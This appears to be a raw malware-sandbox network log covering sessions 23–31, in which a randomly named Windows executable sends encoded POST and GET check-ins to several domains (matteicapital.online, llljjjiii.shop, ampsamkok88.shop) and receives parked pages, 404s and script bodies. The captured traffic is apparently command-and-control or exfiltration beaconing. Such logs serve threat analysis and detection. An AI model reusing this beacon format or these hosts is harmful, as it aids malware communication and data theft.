                                                                                                                        Data Raw: 62 42 77 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 48 67 4d 64 72 46 35 68 76 52 66 4e 61 77 50 49 4d 4b 63 68 33 61 37 56 6b 72 5a 70 44 30 43 66 70 70 36 50 47 68 79 6f 6f 66 72 6c 36 32 64 45 59 74 4e 6e 4f 56 53 66 6d 7a 4c 2b 51 73 6a 51 2f 47 63 6c 31 6b 36 34 35 79 6a 57 4f 43 57 57 49 32 58 5a 4a 69 6a 41 34 35 75 58 50 68 77 37 42 53 4b 36 2b 57 31 6c 54 61 4b 79 50 35 38 63 47 75 4f 4b 65 69 77 76 78 70 59 79 55 35 50 2f 4c 5a 47 49 73 4a 62 42 47 39 31 46 2b 44 54 74 57 69 72 71 6b 30 54 43 64 5a 47 6b 4f 50 6e 73 43 7a 4a 69 33 4e 31 38 45 38 37 34 6d 73 2b 46 4d 69 6b 74 38 31 41 6d 36 4a 58 6b 32 4a 35 34 44 2b 56 41 68 41 3d 3d
                                                                                                                        Data Ascii: bBw=SoNrVhZITNTyHgMdrF5hvRfNawPIMKch3a7VkrZpD0Cfpp6PGhyoofrl62dEYtNnOVSfmzL+QsjQ/Gcl1k645yjWOCWWI2XZJijA45uXPhw7BSK6+W1lTaKyP58cGuOKeiwvxpYyU5P/LZGIsJbBG91F+DTtWirqk0TCdZGkOPnsCzJi3N18E874ms+FMikt81Am6JXk2J54D+VAhA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.9 | 49997 | 208.91.197.27 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:22:14.965322971 CET | 1653 | OUT | POST /hyyd/ HTTP/1.1
Host: www.matteicapital.online
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.matteicapital.online
Cache-Control: max-age=0
Content-Length: 1228
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.matteicapital.online/hyyd/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 48 67 4d 64 72 46 35 68 76 52 66 4e 61 77 50 49 4d 4b 63 68 33 61 37 56 6b 72 5a 70 44 30 36 66 70 66 6d 50 58 32 6d 6f 70 66 72 6c 33 57 64 4a 59 74 4d 6c 4f 56 4b 54 6d 7a 47 4a 51 75 62 51 2b 67 51 6c 69 6c 36 34 33 79 6a 57 4d 43 57 74 47 57 57 45 4a 69 7a 45 34 35 2b 58 50 68 77 37 42 55 6d 36 39 48 31 6c 55 71 4b 78 49 35 38 49 52 2b 4f 6d 65 69 70 61 78 6f 74 48 55 4b 48 2f 4c 35 57 49 76 2f 48 42 48 64 31 44 2f 44 53 79 57 69 75 30 6b 30 66 5a 64 5a 44 73 4f 49 72 73 50 31 41 70 74 75 41 71 58 4f 7a 4c 70 38 47 51 4c 46 78 52 35 55 31 79 37 59 7a 2b 72 70 6f 34 49 61 38 6c 6b 49 4f 64 76 68 63 54 61 51 79 4c 74 49 6f 67 43 66 41 37 35 4b 5a 63 74 31 48 78 6a 76 7a 58 35 4f 74 54 71 4d 65 63 59 41 6c 50 69 35 42 32 67 73 46 77 66 2b 73 59 68 52 78 77 35 6a 33 6f 72 4a 30 67 31 66 55 66 73 52 73 2b 34 68 31 75 71 77 32 4b 6f 58 5a 51 2f 68 57 72 58 75 72 41 74 52 49 42 62 7a 4a 49 7a 61 51 57 53 4b 70 44 35 37 4c 46 39 4d 6e 4e 68 5a 49 54 68 42 [TRUNCATED]
Data Ascii: bBw= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.9 | 49998 | 208.91.197.27 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:22:17.631289959 CET | 346 | OUT | GET /hyyd/?PBk=f4VDN8Bp14IhbV&bBw=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX3VjmPRmhRH/ifjHqvJrHFSE8BVe6vQ== HTTP/1.1
Host: www.matteicapital.online
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 21, 2024 16:22:19.788412094 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Thu, 21 Nov 2024 15:22:18 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
Set-Cookie: vsid=902vr47974813892446974; expires=Tue, 20-Nov-2029 15:22:18 GMT; Max-Age=157680000; path=/; domain=www.matteicapital.online; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Z8A/shAM+EFk00uuoHgm1q2BAzBXVVBufY4XReFIIGQ2fKEcBbhyV/u5lXjJ2pHwBya7gygSKxW15DdxRB+4+Q==
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Connection: close
                                                                                                                        Data Raw: 31 38 33 64 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e
                                                                                                                        Data Ascii: 183d9<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.
                                                                                                                        Nov 21, 2024 16:22:19.788438082 CET1236INData Raw: 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61
                                                                                                                        Data Ascii: net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid"
                                                                                                                        Nov 21, 2024 16:22:19.788454056 CET1236INData Raw: 6e 63 74 69 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72
                                                                                                                        Data Ascii: nction(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="langu
                                                                                                                        Nov 21, 2024 16:22:19.788465977 CET1236INData Raw: 61 6e 67 75 61 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e
                                                                                                                        Data Ascii: anguages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.ha
                                                                                                                        Nov 21, 2024 16:22:19.788479090 CET1236INData Raw: 26 22 2b 68 2e 63 6d 70 5f 70 61 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f
                                                                                                                        Data Ascii: &"+h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}e
                                                                                                                        Nov 21, 2024 16:22:19.788491964 CET1236INData Raw: 73 5b 62 5d 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 22 64 69
                                                                                                                        Data Ascii: s[b]){if(document.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAtt
                                                                                                                        Nov 21, 2024 16:22:19.788506031 CET1236INData Raw: 61 70 70 6c 79 28 61 29 29 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 7c 7c 61 5b 30 5d 3d 3d 3d 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 63 6d 70 2e 61
                                                                                                                        Data Ascii: apply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppV
                                                                                                                        Nov 21, 2024 16:22:19.788547993 CET1236INData Raw: 65 63 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 53 65 63 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 46 69 65 6c 64 22 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 65 6c 73 65 7b 5f 5f 67 70 70 2e 71 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e
                                                                                                                        Data Ascii: ection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object
                                                                                                                        Nov 21, 2024 16:22:19.788564920 CET1236INData Raw: 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 28 61 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70
                                                                                                                        Data Ascii: ow.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addE
                                                                                                                        Nov 21, 2024 16:22:19.788578033 CET1236INData Raw: 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68
                                                                                                                        Data Ascii: ript type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.matteicapital.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.matteicapital.online/px.js?ch=2"></script><script type="text/j
                                                                                                                        Nov 21, 2024 16:22:19.908343077 CET1236INData Raw: 33 35 38 32 38 36 22 2c 78 70 69 64 3a 22 56 77 4d 50 55 31 35 56 47 77 49 46 55 46 52 58 42 67 49 47 55 46 45 3d 22 2c 6c 69 63 65 6e 73 65 4b 65 79 3a 22 36 62 63 31 37 35 65 31 63 38 22 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 44 3a 22 31 35 34
                                                                                                                        Data Ascii: 358286",xpid:"VwMPU15VGwIFUFRXBgIGUFE=",licenseKey:"6bc175e1c8",applicationID:"1545513165"};;/*! For license information please see nr-loader-spa-1.273.1.min.js.LICENSE.txt */(()=>{var e,t,r={8122:(e,t,r)=>{"use strict";r.d(t,{a:()=>i});var n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.9 | 49999 | 8.210.114.150 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:22:26.380956888 CET | 598 | OUT | POST /rsvy/ HTTP/1.1
Host: www.llljjjiii.shop
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.llljjjiii.shop
Cache-Control: max-age=0
Content-Length: 192
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.llljjjiii.shop/rsvy/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 6d 2b 37 4b 49 4d 74 4a 34 2f 42 54 33 4b 49 67 36 67 64 6b 34 54 50 67 68 67 43 44 55 7a 30 42 6f 6e 7a 50 46 35 63 4d 31 5a 6a 77 31 56 77 49 50 6b 54 45 34 63 66 42 4d 57 30 52 4a 58 4e 37 4f 67 65 2b 61 57 48 62 79 43 33 6a 45 72 45 62 6d 75 31 49 42 76 36 52 79 30 6f 66 39 53 66 69 35 6a 36 37 34 61 48 32 62 65 79 55 43 77 59 72 36 31 68 34 73 63 6f 4c 5a 2f 74 74 30 63 43 30 6f 30 36 6c 55 64 36 78 33 38 39 6c 30 58 32 58 6e 66 64 34 50 6d 39 56 6a 36 62 7a 31 55 74 4f 49 36 36 69 2b 71 78 68 4a 39 35 55 77 55 52 34 52 53 4c 6f 53 70 4c 31 6e 2f 6f 66
                                                                                                                        Data Ascii: bBw=m+7KIMtJ4/BT3KIg6gdk4TPghgCDUz0BonzPF5cM1Zjw1VwIPkTE4cfBMW0RJXN7Oge+aWHbyC3jErEbmu1IBv6Ry0of9Sfi5j674aH2beyUCwYr61h4scoLZ/tt0cC0o06lUd6x389l0X2Xnfd4Pm9Vj6bz1UtOI66i+qxhJ95UwUR4RSLoSpL1n/of
Nov 21, 2024 16:22:27.993083954 CET | 925 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 15:22:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=kgacm9v10j5g32gd5oelf2kem6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sessionid=kgacm9v10j5g32gd5oelf2kem6; expires=Sun, 19-Nov-2034 15:22:27 GMT; Max-Age=315360000; path=/
Content-Encoding: gzip
                                                                                                                        Data Raw: 31 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 52 d9 6e 9c 30 14 7d cf 57 dc 3a aa e6 25 06 66 49 53 61 20 52 22 e5 b1 ff 70 31 0e 78 e2 85 da 66 02 fd fa 1a 33 5d 22 e5 ed de e3 63 9f 45 ae 86 a0 55 73 53 0d 02 bb e6 06 a0 d2 22 20 18 d4 a2 26 17 29 de 47 eb 02 01 6e 4d 10 26 d4 e4 5d 76 61 a8 3b 71 91 5c d0 b4 dc 49 23 83 44 45 3d 47 25 ea fd 9d 8e 80 9e f4 bf 1d e7 0f fb e4 85 4b 87 d8 46 be b1 04 f2 24 ec b9 93 63 00 ef 78 4d f2 71 6a 95 e4 f9 19 2f b8 e1 f9 f9 e7 24 dc 42 0f d9 21 3b 66 51 23 3b fb c7 4b 4d 00 c2 32 46 af 41 cc e1 3f 3a 69 aa 7c bb 18 b3 e5 5b b8 aa b5 dd 02 3e 2c 51 96 b4 c8 df 7a 67 27 d3 51 6e 95 75 25 dc 7e eb f0 9e 1f 19 89 37 a4 ee af c4 9d c6 79 0b 5a c2 a9 28 c6 99 a5 d4 25 ec 8b e2 2b 1b ad 8f e1 ad 29 01 5b 6f d5 14 04 73 b2 1f 42 09 05 0b 76 2c e1 18 49 4a bc 26 40 a3 eb 65 a4 16 80 53 b0 6c f7 31 aa d4 d8 8b fc 54 9c b2 d1 f4 24 56 52 7d a1 b4 1a f6 7f 7c 5c 65 37 0f 9f e8 6e af d3 4d 8c 1e 92 d5 2b 96 9c d0 ef 2b 92 c6 fb bf a6 d6 a9 93 7e 54 b8 94 d0 2a cb df d8 [TRUNCATED]
                                                                                                                        Data Ascii: 18dmRn0}W:%fISa R"p1xf3]"cEUsS" &)GnM&]va;q\I#DE=G%KF$cxMqj/$B!;fQ#;KM2FA?:i|[>,Qzg'Qnu%~7yZ(%+)[osBv,IJ&@eSl1T$VR}|\e7nM++~T*/*M'}yzx~xfkcp&r6Z&kka~1h0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.9 | 50000 | 8.210.114.150 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:22:29.046588898 CET | 622 | OUT | POST /rsvy/ HTTP/1.1
Host: www.llljjjiii.shop
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.llljjjiii.shop
Cache-Control: max-age=0
Content-Length: 216
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.llljjjiii.shop/rsvy/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 21, 2024 16:22:30.586858988 CET | 925 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 15:22:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=rc1r48bau6jdvciupgv89fs656; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sessionid=rc1r48bau6jdvciupgv89fs656; expires=Sun, 19-Nov-2034 15:22:30 GMT; Max-Age=315360000; path=/
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.9 | 50001 | 8.210.114.150 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:22:31.728079081 CET | 1635 | OUT | POST /rsvy/ HTTP/1.1
Host: www.llljjjiii.shop
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.llljjjiii.shop
Cache-Control: max-age=0
Content-Length: 1228
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.llljjjiii.shop/rsvy/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.9 | 50002 | 8.210.114.150 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:22:34.382836103 CET | 340 | OUT | GET /rsvy/?bBw=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rQpb0mRwFlkiYxCOBwbKBY/Wtalppug==&PBk=f4VDN8Bp14IhbV HTTP/1.1
Host: www.llljjjiii.shop
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 21, 2024 16:22:35.934837103 CET | 1120 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 15:22:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=l3f38bf2go89nh2na4t17evr50; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sessionid=l3f38bf2go89nh2na4t17evr50; expires=Sun, 19-Nov-2034 15:22:35 GMT; Max-Age=315360000; path=/
Data Ascii: 268<html><head> <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" /> <script src="/public/javascript/jquery-2.2.3.min.js?v=" type="text/javascript"></script></head><body style="background-color: #6da5c3;"><img style='max-width: 400px;width: 100%;position: absolute;right: 0;top: 30%;left: 0;margin: 0 auto;' src="/public/image/404.png"/>...<h1 style='width: 400px;position: absolute;margin-left: -200px;margin-top: -80px;top: 50%;left: 50%;display: block;z-index: 2000;color:#FB7C7C;text-align: center'> 404 Not Found </h1>--></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.9 | 50003 | 172.67.209.48 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:22:41.420078993 CET | 604 | OUT | POST /huvt/ HTTP/1.1
Host: www.ampsamkok88.shop
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.ampsamkok88.shop
Cache-Control: max-age=0
Content-Length: 192
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.ampsamkok88.shop/huvt/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 21, 2024 16:22:42.641472101 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Thu, 21 Nov 2024 15:22:42 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BjKVYOoOrM11IgIlfh1%2Bf2WxSOXkBcXa5Ddz0z8EyzZud1gcrcKiOOtjw%2FXu5%2BeqTEmf5N3%2FD3kJRyslTP3UrLOIgI2GIP3dOe1LSFxtcRPDFwRdyxGQFyniT4YuuaUJj4ciQed8Yw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e61ad3eca210f70-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1580&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=604&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 21, 2024 16:22:42.641494989 CET | 264 | IN | Data Raw (gzip-compressed chunked response body, continued)
Nov 21, 2024 16:22:42.642147064 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.9 | 50004 | 172.67.209.48 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:22:44.083441973 CET | 628 | OUT | POST /huvt/ HTTP/1.1
Host: www.ampsamkok88.shop
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.ampsamkok88.shop
Cache-Control: max-age=0
Content-Length: 216
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.ampsamkok88.shop/huvt/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 21, 2024 16:22:45.356559038 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Thu, 21 Nov 2024 15:22:45 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gMZGK1ElQpsQRBkpCuE1BjbMBg2uqWfXOyBUdqIHgN5iPAiDPHbk9LFDu1xJhT68UUsAhmtUbbVAv8MHp7RJvA2QJ9LOdIMTkre5VvuWGrdfrLdM3xU01gOsWkTD02nBcY9YsBxR1w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e61ad4fbe7142ea-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1611&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=628&delivery_rate=0&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 21, 2024 16:22:45.356585026 CET | 261 | IN | Data Raw (gzip-compressed chunked response body, continued)


                                                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                         31 | 192.168.2.9 | 50005 | 172.67.209.48 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                                                         Nov 21, 2024 16:22:46.856908083 CET | 1641 bytes | OUT | POST /huvt/ HTTP/1.1
                                                                                                                        Host: www.ampsamkok88.shop
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.ampsamkok88.shop
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
